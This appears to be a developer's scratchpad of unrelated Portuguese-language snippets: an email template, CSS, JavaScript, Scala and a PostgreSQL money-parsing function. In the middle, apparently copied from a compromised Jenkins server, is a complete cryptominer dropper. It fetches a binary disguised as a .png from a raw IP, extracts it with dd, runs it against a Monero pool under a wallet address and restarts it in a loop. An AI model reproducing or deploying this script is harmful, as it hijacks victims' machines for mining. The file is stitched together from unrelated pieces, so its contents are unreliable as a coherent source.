  Olá ##nome##,<p><br>&nbsp;   </p><p><img src="http://nb.vilarika.com.br/images/home_F644243920084XDXFND.jpg.png" alt=""></p><p></p><p></p>


sources_bak

/**
   * Synchronously send an email.
   */
  def blockingSendMail(from: From, subject: Subject, rest: MailTypes*) {
    msgSendImpl(from, subject, rest.toList)
  }
  



Botão submit com imagem
Let's say your image is a 16x16 .png icon called icon.png Use the power of CSS!

CSS:

input#image-button{
    background: #ccc url('icon.png') no-repeat top left;
    padding-left: 16px;
    height: 16px;
}
HTML:

<input type="submit" id="image-button" value="Text"></input>
This will put the image to the left of the text.



align="left"
margin-bottom: 0px; ??????
line-height: normal;
margin: 0px; ??????
font-stretch: normal;
color="#000000"
mso-bidi-font-weight:normal
font-size-adjust: none;
border-color: rgb(0, 0, 0);
border-image: none;

border-right-width: initial;
border-right-style: none;
border-top: none;

solid rgb(0, 0, 0) => solid
solid #000000 => solid



mateus - capar array com mais de 2 colunas 

console.log(data.map(function(a){
	return {
		0: a[0],
		1: a[1]
	}
}));



#!/bin/sh
ps -fe|grep conns |grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
wget 104.156.239.160:8087/587b626883fdc.png -O /tmp/conn
dd if=/tmp/conn skip=7664 bs=1 of=/tmp/conns
chmod +x /tmp/conns
nohup /tmp/conns  -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 44xdB6UmabC8R69V6jDj7q1zGyDzJ7ks5GJpLs3b2HpqWwWq2xbvLKiRjmX8e9oy7426goZG9kXRTgHj9SZPGzfiQYtbTw1 -p x >/dev/null 2>&1 &
else
root@prd-vilarika:/tmp# head -60 conn.sh
#!/bin/sh
ps -fe|grep conns |grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
wget 104.156.239.160:8087/587b626883fdc.png -O /tmp/conn
dd if=/tmp/conn skip=7664 bs=1 of=/tmp/conns
chmod +x /tmp/conns
nohup /tmp/conns  -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 44xdB6UmabC8R69V6jDj7q1zGyDzJ7ks5GJpLs3b2HpqWwWq2xbvLKiRjmX8e9oy7426goZG9kXRTgHj9SZPGzfiQYtbTw1 -p x >/dev/null 2>&1 &
else
echo "runing....."
fi

sleepTime=20

while [ 0 -lt 1 ]
do
    ps -fe| grep conns | grep -v grep 
    if [ $? -ne 0 ]
    then
        echo "process not exists ,restart process now... "
        wget 104.156.239.160:8087/587b626883fdc.png -O /tmp/conn
        dd if=/tmp/conn skip=7664 bs=1 of=/tmp/conns
        chmod +x /tmp/conns
        nohup /tmp/conns -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 44xdB6UmabC8R69V6jDj7q1zGyDzJ7ks5GJpLs3b2HpqWwWq2xbvLKiRjmX8e9oy7426goZG9kXRTgHj9SZPGzfiQYtbTw1 -p x >/dev/null 2>&1 & 
  echo "restart done ..... "
    else
        echo "process exists , sleep $sleepTime seconds "
    fi
    sleep $sleepTime
done



==============

-rw-r--r-- 1 jenkins jenkins 1224816 May 14 16:55 conn
-rwxr-xr-x 1 jenkins jenkins 1217152 May 14 16:55 conns
-rwxr-xr-x 1 jenkins jenkins    1071 May 14 16:55 conn.sh


-- Function: fu_mgr_value(text)

-- DROP FUNCTION fu_mgr_value(text);

CREATE OR REPLACE FUNCTION fu_mgr_value(st_in text)
  RETURNS numeric AS
$BODY$

/*
recebe uma string e verifica nulo, R$ ",00" e retorna o number
faz o camel tira . etc

*/

declare

st_out    text;

begin

    st_out = st_in;

    if (st_out is null) then
  st_out = '0';
    end if;

    if (trim (st_out) = '') then
  st_out = '0';
    end if;

    st_out = replace(st_out, ' ', ''); 
    st_out = replace(st_out, 'R$', ''); 
    st_out = replace(st_out, 'r$', ''); 
    st_out = replace(st_out, '$', ''); 
    if (st_out like '%,__') then
  st_out = replace(st_out, '.', ''); 
  st_out = replace(st_out, ',','.');
    end if;

    return to_number (st_out,'999999999.99');    
end ;
$BODY$
  LANGUAGE plpgsql IMMUTABLE STRICT
  COST 100;
ALTER FUNCTION fu_mgr_value(text)
  OWNER TO jenkins;
GRANT EXECUTE ON FUNCTION fu_mgr_value(text) TO jenkins;
GRANT EXECUTE ON FUNCTION fu_mgr_value(text) TO public;
GRANT EXECUTE ON FUNCTION fu_mgr_value(text) TO "gerir-me";


ALTER TABLE product ADD COLUMN markup numeric(16,4);
ALTER TABLE product ADD COLUMN size_c character varying(20);

